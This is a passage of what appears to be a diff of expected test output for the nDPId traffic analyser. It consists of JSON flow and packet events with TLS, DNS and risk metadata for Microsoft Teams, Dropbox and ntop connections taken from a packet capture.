{"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587041682440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041682440,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES9AAEARZ+LAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAHT\/ICoAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00889{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1160,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041682376,"flow_last_seen":1587041682467,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1688,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041682467,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041682611} 
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041682598,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1587041682668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1587041682668,"pkt":"EBMx8Tl2KDc3AG3ICABFAABW2rQAAP8RXYrAqAEGwKgBAeC6ADUAQqKILzcBAAABAAAAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1587041682697,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1587041682697,"pkt":"KDc3AG3IEBMx8Tl2CABFAACny9dAADkR8hbAqAEBwKgBBgA14LoAkwAALzeBgAABAAIAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAASwANRRhLXVwcy1wcmVzZW5jZTQtcHJvZAtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AwEYAAQABAAAABgAENHJNOg=="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041682697,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.58"}} 
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041682697,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.58"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682698,"flow_last_seen":1587041682698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682698,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1587041682698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682698,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG913AqAEGNHJNOuyBAbtgCOGqAAAAALAC\/\/\/jdgAAAgQFtAEDAwUBAQgKMISvtwAAAAAEAgAA"} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1587041682740,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEdws9AADEGDl2ifRODwKgBBgG767gSqyGfi6a7DoAYAWi65wAAAQEICpHNoqswhBBbFwMDAOQAAAAAAAAACKmKftpP18TObpudfRHF+x2Q26rJbEiP394UtjZJPj4wSIR\/hp3JlNrAGtpUw45IgQ+\/Td3gBgwIaydoMxwS3i93S6aIvQahVpj\/c5RwIn5XTgvMLlxphbaNgBQKVcUBzOyFCFmX25bboaZrE8yGPewBV8YF9rPw3wiL2qX6gOrVwGBD+SxN5WBWFI2hGO+JWJUmRSYMjHC+44xSTFiyxGwuYeySW1fNosn1ZrrnxmEfRHvkqjQUYvkmRW87MNYmA\/nzpUUAJUjx7fyAlsSNV0cWWtSO31yX1lU5orE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682740,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwxXAqAEGon0Tg+u4AbuLprsOEqsiiIAQD\/hw3AAAAQEICjCEr+CRzaKr"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1587041682744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA09YRAAGwG1eQ0ck06wKgBBgG77IG+FZNKYAjhq4AS\/\/+qaAAAAgQFoAEDAwgBAQQC"} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1587041682744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG93XAqAEGNHJNOuyBAbtgCOGrvhWTS1AQIADLJwAA"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 01289{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1587041682745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":665,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":665,"pkt_l4_len":631,"thread_ts_msec":1587041682745,"pkt":"EBMx8Tl2KDc3AG3ICABFAAKLAABAAEAGwL7AqAEGon0Tg+u4AbuLprsOEqsiiIAYEAA0LgAAAQEICjCEr+ORzaKrFwMDAlK2BaXSajSAVWEKj3frXxijYpT3GD2Cuos6bxaeeEb0O6UJhzmzPZI\/SWy+fgBnTfneCwusduYkx4s3F4xCn2MY3DEvpr\/P48ATzKlJ++OHqI7OI3KpokJ1bF8YwJjJpFyWkPT0\/gdDA2C0thwexYlLgVCHe4dECfAKO3ai6a9AkpIGftSCmWnSsB7\/GodcDd1wDIWHn+mS6A9bTO\/2sRCfLQjmwaqnM\/0Kd1DorrQMm9TT6\/w11NzOyGJGqVRWfthWKCJ2r5CEFaogXR64MxPpr2FM6spcuDUY4C3Hc53Q7uc97BndljPBEgsGGu2WIs1hpBKyBrbp4cakeWFrgRHILDge\/JLjoB\/we0ie6rPfHdzAzbH+CVHboc7ECVvIV6N2Rd\/z5fI6cJ5y1i\/CGpe9JS\/DjF+npNlL3gVvBs3y7VpT4ziTRBRlbzG6hzfaYWVE\/I1GNwloup0kRP0\/\/fFg59buQBmTxdHJsfm4laPDQEGg2\/E9TD5wbcmagME1tYB8Z6HaDDAe1MbrBXtLSM8VMS0ZeI23LZfgw6dIscXGQh+EZCVohYQ2K\/dCOtZqYIGlXsZd11O+bX\/KPVaVnsGCQqimWVbYkJXTdkE5fdL4ibwUdj8vI7+8IXUv8oArxAdVEWB2+pth6d9Zti7C4SxMlmajA50jkJHElO8G4w6Wzb86qkyK4WbkuYLazUSRxEvrQrVtZjtDDcEAhbB3i\/CCiXoyK9403MAI7UV+NXn0+Iqmacnoi+GSVKkccDjbrlFQ3qxHSBpnh\/Zt22FSB4TV4eA="} 
+00872{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041682698,"flow_last_seen":1587041682792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1587041682792,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682809,"flow_last_seen":1587041682809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682809,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1587041682809,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682809,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyCEVImrEWfAAAAALAC\/\/+rgAAAAgQFtAEDAwUBAQgKMISwIQAAAAAEAgAA"} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1587041682862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7ILLfLe3JqxFoKAS\/ogNbwAAAgQFrAQCCAoTeRnVMISwIQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1587041682862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyCEVImrEWgy3y3uIAQECwqYQAAAQEICjCEsFATeRnV"} -01032{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01086{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00873{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1439,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682698,"flow_last_seen":1587041683109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9547,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1587041683109,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01032{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 